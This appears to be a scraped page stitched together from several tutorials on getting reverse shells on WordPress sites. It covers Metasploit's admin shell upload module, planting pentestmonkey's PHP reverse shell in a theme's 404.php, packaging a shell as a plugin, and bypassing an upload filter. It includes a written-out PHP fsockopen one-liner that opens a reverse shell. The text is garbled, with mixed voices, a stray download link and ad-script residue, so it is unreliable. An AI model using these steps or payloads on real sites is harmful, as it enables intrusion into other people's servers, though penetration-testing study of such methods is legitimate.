After exploit a remote command execution vulnerability then we can use a reverse shell to obtain an interactive shell session on the target machine. Throughout our article we are going to use this web shell to achieve the reverse shell of the target machine. Ready ? !! We execute the given command to edit the localhost address from the malicious shell.

Sometimes plugins installed in WordPress CMS are vulnerable, by taking advantage of which we can upload our malicious PHP shells to the target server and get reverse shells. In our case, as you can see a vulnerable plugin called Reflex is located on the WordPress CMS, so now we will try to exploit target mahcine by uploading shell through this plugin.

How To Upload Shell On WordPress

Download: https://urlca.com/2vFXtL

The very first method that we have is Metasploit framework, this module takes an administrator username and password, logs into the admin panel, and uploads a payload packaged as a WordPress plugin. Because this is authenticated code execution by design, it should work on all versions of WordPress and as a result, it will give meterpreter session of the webserver.

Now, to proceed further, we used the reverse shell of PHP (By Penetstmonkey). And then we copied the above php-reverse-shell and paste it into the 404.php wordpress template as shown in the picture below. We have altered the IP address to our present IP address and entered any port you want and started the netcat listener to get the reverse connection.

Once the Plugin File is Updated again we need to start our Netcat Payload Listener and then we execute the reverse shell using the curl command. and the second way is navigating the edited plugging directory on the browser.

As you might have guessed, Metasploit would never lack in this post. It is the leading penetration testing framework we have in the security field. Metasploit has a module that makes it easy to upload a reverse shell as a payload to the WordPress site. Follow the steps below.

This module will automatically authenticate with the Wordpress site and upload a Reverse Shell. If successful, it will launch a Meterpreter session where you can execute commands directly on the web server. Use the help command to list all the available options.

To execute the PHP reverse shell you just set up, you need to trigger the 404 page. You can easily do that by navigating to a page you are sure is not on the website. For example, we will try accessing the dummydummydummy page for this post.

I'm working on project which involves creating a WordPress plugin and it got me to thinking about how easy it would be to create a plugin that's sole purpose is a reverse shell. To get a shell from a WordPress UI, I've used plugins that allow for inclusion of PHP and I've also edited embedded PHP such as the footer.php file. But until now, I didn't occur to me to write a plugin to perform the task. I started tinkering around and I initially used Pentest Monkey's reverse shell and even though it tossed back a shell, it also killed the WordPress site. I literally had to go into the /wp-content/plugins directory to manually remove the plugin before the site would function correctly again. Not ideal for a number of reasons.

At that point, I decided to take a more basic approach. First things first, if you just drop PHP into a file and try to upload it as a plugin, it won't work. I didn't bother to dig into the details but I think we need the comment section at the top in order for WordPress to treat it like a plugin. When I added that comment information, my plugin was successfully uploaded.The code is pretty basic and it looks like this:

There's literally more comment than code. If we were on the server itself, we could drop this PHP file into the /wp-content/plugin folder but if we were already on the server, we probably wouldn't need a reverse shell. Perhaps for the sake of persistence? Perhaps not. I'm just tossing that out there as an FYI.In order to upload the shell as a plugin, we need to zip it up:

If at this point, we selected Plugins from the WordPress UI, we would see that the shell is not activated. Technically it is activated, the shell is proof, but the shell is also hanging the completion of the Activate process. If we kill the shell and then move into Plugins, we'd see:

This is about as basic as you can get. It's definitely dirty in the sense that it consistently attempts to toss a shell every time you mess with the Plugins menu item. This could be cleaned up and it could also be repurposed to do just about anything you can code in PHP.

Users are allowed to upload files with extensions such as png, txt and pdf among others, but are prohibited from uploading PHP files. Trying out other potentially malicious file formats like php3, php5, phtml etc. were also being rejected.

To execute the exploit, we visit the endpoint -content/uploads/sp-client-document-manager/2/webshell.php. The URL is serving the webshell.pHP file, regardless of the case sensitivity, allowing us to execute commands. Note that 2 is the UID of the logged-in user that uploaded the file.

After verifying the exploit, we can either upload a PHP reverse shell file like the one from pentestmonkey or upgrade our web shell to a reverse shell by executing the PHP command php -r '$sock=fsockopen("IP",PORT);exec("/bin/sh -i &3 2>&3");' and set our server to listen to the port we specified

2. On the left hand side you can see editor option under appearance just follow that option.3. After getting in editor you will see different themes. So select any theme you want and then select template as shown in below image.4. After selecting theme and template just replace this code with our shell code and then upload file.5. Now after uploading file it must show File edited successfully and after that go to your shell directory i.e.www.targetsite.com/wp-content/themes/yourtheme/templatename.php.Our shell is uploaded ?__ATA.cmd.push(function() __ATA.initDynamicSlot(id: 'atatags-26942-63e55ad53eb87',location: 120,formFactor: '001',label: text: 'Advertisements',,creative: reportAd: text: 'Report this ad',,privacySettings: text: 'Privacy',onClick: function() window.__tcfapi && window.__tcfapi( 'showUi' ); ,););Share this:TwitterFacebookLike this:Like Loading...Leave a Reply Cancel replyEnter your comment here...Fill in your details below or click an icon to log in:

This page contains detailed information about how to use the exploit/unix/webapp/wp_admin_shell_upload metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Name: WordPress Admin Shell UploadModule: exploit/unix/webapp/wp_admin_shell_uploadSource code: modules/exploits/unix/webapp/wp_admin_shell_upload.rbDisclosure date: 2015-02-21Last modification time: 2021-08-29 16:59:44 +0000Supported architecture(s): phpSupported platform(s): PHPTarget service / protocol: http, httpsTarget network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888List of CVEs: -

This module takes an administrator username and password, logs into theadmin panel, and uploads a payload packaged as a WordPress plugin.Because this is authenticated code execution by design, it should workon all versions of WordPress.

Hello aspiring Ethical Hackers. In this article you will learn about multiple WordPress reverse shell methods. As you all might already know, WordPress is a popular open source Content Management System (CMS) based on PHP and MySQL or MariaDB as database. It was released in year 2003.

In this article we will show you how to gain a reverse shell on a WordPress website once we have the credentials of the website. This is a comprehensive collection methods to gain reverse shell on WordPress. This Tutorial assumes that you have already acquired WordPress credentials and can access the WordPress dashboard.

This will give us a meterpreter session successfully. These are the four common methods through which a reverse shell can be achieved on the WordPress. Now, you decide Which is your favorite method of gaining a reverse shell on WordPress?

The image manager is locked down pretty good at this point from non-authorized users. If the account is comprised or the upload manager is exposed publically it will still be hard to exploit it. As you can see from the source the uploader verifies mime types, checks if it's an image with getimagesize(), sanitizes file names, creates the file name with the extension hard coded based off mimetype, sets default file permissions, embedded data like EXIF information is also sanitized, and the file is re-sampled when it creates the multiple sizes. The way the upload code works you don't get any attack points to the GD image processing library either.

Aside from their protection if it has an image extension the server's mine types are not configured to pipe it through the php-cgi process. Meaning, simply running the image in a browser will not allow it to run the PHP code. You would have to have a PHP script run the code embedded in the image. You likely won't find vulnerabilities in the code base to do this for you. This is universal so you will also have difficulty with other image uploaders if they restrict php file extensions as well.

The --os-shell works for MySQL by attempting to use an into outfile to write a file to the web root. This can fail for any number of reasons. The most common reason being that the database and web server and different machines. Ubuntu's default AppArmor rule sets forbid MySQL from writing to /var/www/. Also, into outfile requires file privileges that should never be granted (but often is). You could try using sqlmap's file-io functionality to read and write to the remote file system. 2ff7e9595c